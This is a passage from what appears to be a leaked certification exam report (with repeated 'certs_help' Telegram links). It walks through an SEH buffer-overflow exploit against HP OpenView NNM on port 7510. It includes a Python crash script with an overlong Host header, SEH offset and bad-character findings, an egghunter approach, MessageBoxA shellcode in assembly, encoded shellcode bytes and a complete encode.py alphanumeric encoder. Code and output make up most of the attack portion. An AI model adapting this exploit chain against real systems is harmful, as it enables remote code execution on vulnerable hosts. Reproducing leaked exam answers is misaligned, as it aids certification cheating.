Following the “Module -0x08-HPOpenView NNM” outline in the course material.

1. Created a HTTP.spk file to fuzz the software and see how it acts. Used command
“generic_send_tcp 192.168.26.240 http.spk 00”

a. The fuzzer resulted in SEH violation crash on the server

40 | P a g e

https://t.me/certs_help
41 | P a g e

https://t.me/certs_help
2. Replicating the crash, with the following python script:

1. #!/usr/bin/python
2.
3. import socket, os, sys
4.
5. buffSize=4000
6. ip_add="192.168.26.240"
7. port=7510
8. crash= "A" * 4000
9. print "\n[*] Creating payload ... "
10.
11. buff="GET /topology/home HTTP/1.1\r\n"
12. buff+="Host: " + crash + "\r\n"
13. buff+="Content-Type: application/x-www-form-urlencoded\r\n"
14. buff+="User-
Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Ice
weasel/43.0.4\r\n"
15. buff+="Content-length: 1048580\r\n\r\n"
16.
17. print "[*] Sending evil HTTP request to NNMz, ph33r"
18. print "[*] Waiting for crash"
19. s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
20. s.connect((ip_add,port))
21. s.send(buff)
22. s.close()

43 | P a g e

https://t.me/certs_help
3. Now knowing that a buffer of 4000 bytes will overwrite SEH using “!mona pattern_create” to
generate a unique 4000 byte string. Modify by replacing the “crash=”A”*3377” with
“crash=”(4000 BYTE STRING)”” in the python script to determine at which location SEH is being
overwritten.

44 | P a g e

https://t.me/certs_help
a. Execucting the script and follow the SEH crash, once we have the value SEH we will

again use “!mona pattern_offset 45376945” to find the offset of where SEH is being
overwritten at. The results returned with an offset of 3381 bytes.

45 | P a g e

https://t.me/certs_help
b. Now checking to see if we can control the execution flow of EIP we modify the following
line in the script to crash=”A”*3381+”B”*4+”C”*615. Now in can see that EIP is being
overwritten at bytes 3382. Now we have control of EIP.

46 | P a g e

https://t.me/certs_help
4. In the course we know that we will encounter a complications with bad characters and will using
the “POP POP RET” method to control code execution. Due to the all the bad characters
contorting the shellcode, we need locate a “POP POP RET” where the address is fully
alphanumeric.
a. The executable “C:\Program Files\HP OpenView\bin\findjump2.exe” can be ran to list all
the available “POP POP RET” calls. We locate a valid address located inside jvm.dll

5. Now we need to locate a location where we can place our payload and where non-alphanumeric
characters will be accepted. Modify the python script to create this buffer space for us.

47 | P a g e

https://t.me/certs_help
1. buff += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0)\r\n\r\n"
2. buff += "Content-length: 1048580\r\n\r\n"
3. buff += "\xcc" * 1500

a. Regrettably, we can’t get away from the bad characters when it comes to our shellcode.

We need to determine which characters are recognized as good valid characters and
which are not. Luckily, the course provided a python script (find_badchars.py) to find
these bad characters. After running it we came up of a list of acceptable characters
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x0a \x0b \x0c \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17
\x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x21 \x22 \x23 \x24 \x25 \x26 \x27 \x28 \x29 \x2a \x2b \x2c \x2d
\x2e \x30 \x31 \x32 \x33 \x34 \x35 \x36 \x37 \x38 \x39 \x3b \x3c \x3d \x3e \x41 \x42 \x43 \x44 \x45 \x46
\x47 \x48 \x49 \x4a \x4b \x4c \x4d \x4e \x4f \x50 \x51 \x52 \x53 \x54 \x55 \x56 \x57 \x58 \x59 \x5a \x5b
\x5c \x5d \x5e \x5f \x60 \x61 \x62 \x63 \x64 \x65 \x66 \x67 \x68 \x69 \x6a \x6b \x6c \x6d \x6e \x6f \x70
\x71 \x72 \x73 \x74 \x75 \x76 \x77 \x78 \x79 \x7a \x7b \x7c \x7d \x7e \x7f

6. The bufferspace address in the above python script doesn’t show up anywhere inside the
registers , in order to locate where this memory reside we need to implement an egghunter
methodology.
a. The egghunter is 32 bytes in length, it is used to locate a specific string in memory. In
this particular instance we will be looking for the string “W00TW00T”.
b. Following the steps outlined in the course we created an alphanumeric shellcode using
calc, aligned our stack, encoded our egghunter which will decode itself during runtime,
encoded our shellcode payload, which it too will decode itself during runtime, replace
our dummy buffer with the encoded values and was able to get our shellcode to
execute.
7. Instead of achiving a reverse or bind shell, we were tasked to use a msgbox which recquired a
few additional steps.
a. Using the following code to create the msgbox:

[BITS 32]
mov ebp, 0
push ebp
mov ebp, 0x646E7770
push ebp
mov esi, esp
xor eax, eax
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value pwnd\00)
push esi ; Push the second parameter (lpText) to the stack (value pwnd\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x773BD8DE ; Move the MessageBoxA address in to eax

48 | P a g e

https://t.me/certs_help
call eax ; Call the MessageBoxA function with all parameters supplied.

b. Compiled the msgbox using nasm

c. Create a file only comprising of the hex values, ran it through parse.py to create the
output recognized by encode.py
d. Modifed encode with the hex values and added NOPs to fill then ran encode.py which
output the following results

49 | P a g e

https://t.me/certs_help
i. Then paste the results into the the python script (Refereced in section “5.1 PoC
Code”)
Egghunter: 6870776E
Encoded: 91888f98
Found: 0x5f 0x10 0x22 (0x91)
Found: 0x59 0x10 0x1f (0x88)
Found: 0x5d 0x10 0x22 (0x8f)
Found: 0x63 0x10 0x25 (0x98)
===================================
Egghunter: 6468202020
Encoded: -1f20206864
Found: 0x7f 0x10 0x70 (0xff)
Found: 0x7f 0x10 0x62 (0xf1)
Found: 0x7f 0x10 0x72 (0x101)
Found: 0x7f 0x10 0x77 (0x106)
Found: 0x57 0x10 0x1e (0x85)
Found: 0x7f 0x10 0x75 (0x104)
===================================
Egghunter: 0089E589E6
Encoded: -e589e58900
Found: 0x7f 0x10 0x63 (0xf2)
Found: 0x38 0x10 0x10 (0x58)
Found: 0x67 0x10 0x27 (0x9e)
Found: 0x38 0x10 0x10 (0x58)
Found: 0x5f 0x10 0x20 (0x8f)
Found: 0x7f 0x10 0x71 (0x100)
===================================
Egghunter: 31C0505656
Encoded: -555650c031
Found: 0x7f 0x10 0x6c (0xfb)
Found: 0x35 0x10 0x10 (0x55)
Found: 0x41 0x10 0x13 (0x64)
Found: 0x7f 0x10 0x7c (0x10b)
Found: 0x7f 0x10 0x73 (0x102)
Found: 0x7f 0x10 0x72 (0x101)
===================================
Egghunter: 50B8DED83B
Encoded: -3ad8deb850
Found: 0x7f 0x10 0x6e (0xfd)
Found: 0x71 0x10 0x2c (0xad)
Found: 0x5d 0x11 0x1f (0x8d)
Found: 0x7f 0x10 0x5c (0xeb)
Found: 0x57 0x10 0x1d (0x84)
Found: 0x7f 0x10 0x71 (0x100)
===================================
Egghunter: 77FFD0
Encoded: ff2f0089

50 | P a g e

https://t.me/certs_help
Found: 0x7f 0x10 0x6f (0xfe)
Found: 0x7f 0x31 0x7e (0x12e)
Found: 0x7f 0x10 0x71 (0x100)
Found: 0x59 0x11 0x1f (0x89)
===================================
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x59\x7f\x7f\x7f"
"\x2d\x11\x10\x31\x10"
"\x2d\x1f\x71\x7e\x6f"
"\x50"
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x7f\x57\x7f\x5d\x71\x7f"
"\x2d\x10\x10\x10\x11\x10\x10"
"\x2d\x71\x1d\x5c\x1f\x2c\x6e"
"\x50"
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x7f\x7f\x7f\x41\x35\x7f"
"\x2d\x10\x10\x10\x10\x10\x10"
"\x2d\x72\x73\x7c\x13\x10\x6c"
"\x50"
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x7f\x5f\x38\x67\x38\x7f"
"\x2d\x10\x10\x10\x10\x10\x10"
"\x2d\x71\x20\x10\x27\x10\x63"
"\x50"
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x7f\x57\x7f\x7f\x7f\x7f"
"\x2d\x10\x10\x10\x10\x10\x10"
"\x2d\x75\x1e\x77\x72\x62\x70"
"\x50"
"\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A"
"\x2d\x63\x5d\x59\x5f"
"\x2d\x10\x10\x10\x10"
"\x2d\x25\x22\x1f\x22"
"\x50"

51 | P a g e

https://t.me/certs_help
6.0 Additional Items Not Mentioned in the Report
This section is placed for any additional items that were not mentioned in the overall report.

• Encode.py
1. #!/usr/bin/python
2.
3. import sys, getopt
4. import time, math, re
5.
6.
7. egghunter = ([
8. '\\xBD\\x00\\x00\\x00',
9. '\\x00\\x55\\xBD\\x70',
10. '\\x77\\x6E\\x64\\x55',
11. '\\x89\\xE6\\x31\\xC0',
12. '\\x50\\x56\\x56\\x50',
13. '\\xB8\\xDE\\xD8\\x3B',
14. '\\x77\\xFF\\xD0\\x90'
15. ])
16.
17.
18. goodComboList=[]
19. goodCharList=[]
20.
21.
22. def load_GoodChars(gc):
23. for item in gc:
24. val = '%x' % int(item.strip().lstrip("\\x"),16)
25. if len(val) > 1:
26. goodComboList.append(val)
27.
28. def convert_Egghunter():
29. convertedEgg=[]
30.
31. for ii in egghunter:
32. revValue = ""
33. tmp = ii.split("\\x")
34. del tmp[0]
35. revValue = ''.join(reversed(tmp))

52 | P a g e

https://t.me/certs_help
36.
37. hexRev = '%x' % (0xffffffff - int(revValue,16) + 1)
38. if len(hexRev) == 6:
39. hexRev = "00" + hexRev
40. if len(hexRev) == 7:
41. hexRev = "0" + hexRev
42. convertedEgg.append(hexRev)
43. return convertedEgg
44.
45.
46. def findAltValues(egg):
47. validNumbers = []
48. carryFlag = False
49. for index,targetVal in enumerate(egg):
50. tmpList = []
51.
52. for value in range(0,len(targetVal),2):
53. flag = False
54. endgoal = int(targetVal[value:value+2],16)
55.
56. if endgoal == 0 and value ==0:
57. endgoal = 256
58. else:
59. if endgoal/3 < 0x10:
60. endgoal = endgoal + 256
61. carryFlag = True
62.
63. for xx in reversed(goodComboList):
64. high = int(xx,16)
65. if high > (endgoal / 3) and high < (endgoal/3)*2:
66. for yy in goodComboList:
67. low = int(yy,16)
68. tmp = high + low
69. answer = endgoal - tmp
70.
71. if hex(answer)[2:] in goodComboList :
72. flag = True
73. break
74. if flag:
75. break
76.
77. if carryFlag:
78. carryFlag = False

53 | P a g e

https://t.me/certs_help
79. if len(tmpList) > 0:
80. changeup = tmpList[len(tmpList)-1]
81. newAnswer = hex(int(changeup[2],16) - 1)
82. if len(newAnswer) != 4:
83. newAnswer = newAnswer[:2] + '0' + newAnswer[2:]
84.
85. changeup[2] = newAnswer
86. tmpList[len(tmpList)-1] = changeup
87.
88.
89. tmp = [hex(high),hex(low),hex(answer)]
90. tmpList.append(tmp)
91.
92. validNumbers.append(tmpList)
93.
94. for index in xrange(0,len(validNumbers)):
95. print " Egghunter:",egghunter[index].replace("\\x","")
96. print " Encoded:",egg[index]
97.
98. for xx in validNumbers[index]:
99. target = int(xx[0],16) + int(xx[1],16) + int(xx[2],16)
100. print "{0: >13}{1} {2} {3} ({4})".format("Found: ",xx[0],xx[1],x
x[2],hex(target))
101. print "="*35
102. return validNumbers
103.
104.
105. def create_EAX_Code(validCodes):
106.
107. fixedList = []
108. asm = ""
109. for values in reversed(validCodes):
110. cmd = ""
111. cmd1 = ""
112. cmd2 = ""
113.
114. for value in reversed(values):
115. cmd = cmd + "\\" + value[0][1:]
116. cmd1 = cmd1 + "\\" + value[1][1:]
117. cmd2 = cmd2 + "\\" + value[2][1:]
118.
119.
120. asm += "\"\\x25\\x4A\\x4D\\x4E\\x55\"\n" #AND EAX,554E4D4A

54 | P a g e

https://t.me/certs_help
121. asm += "\"\\x25\\x35\\x32\\x31\\x2A\"\n" #AND EAX,2A313235
122. asm += "\"\\x2d{}\"\n".format(cmd)
123. asm += "\"\\x2d{}\"\n".format(cmd1)
124. asm += "\"\\x2d{}\"\n".format(cmd2)
125. asm += "\"\\x50\"\n"
126.
127. return asm
128.
129.
130.
131.
132. if __name__ == '__main__':
133. myEgg=[]
134. goodAddresses=[]
135.
136. if(len(sys.argv) < 2):
137. print "Usage: ./encode.py [allowed_chars_file]..."
138. print "\nallowed_chars_file has to be a file containing non-
delimited list"
139. print "of allowed hexadecimal characters.\n"
140. print "ex. \\x01\\x02\\xab\n"
141. sys.exit()
142.
143. gf = sys.argv[1]
144. # gf = "goodList.txt"
145. try:
146. fo = open(gf)
147. line=fo.readlines()
148. load_GoodChars(line)
149. myEgg = convert_Egghunter()
150.
151. isValid = findAltValues(myEgg)
152. asm_code = create_EAX_Code(isValid)
153. print asm_code
154.
155. except IOError:
156. print "File not found ..."
157. sys.exit()

55 | P a g e

https://t.me/certs_help

You might also like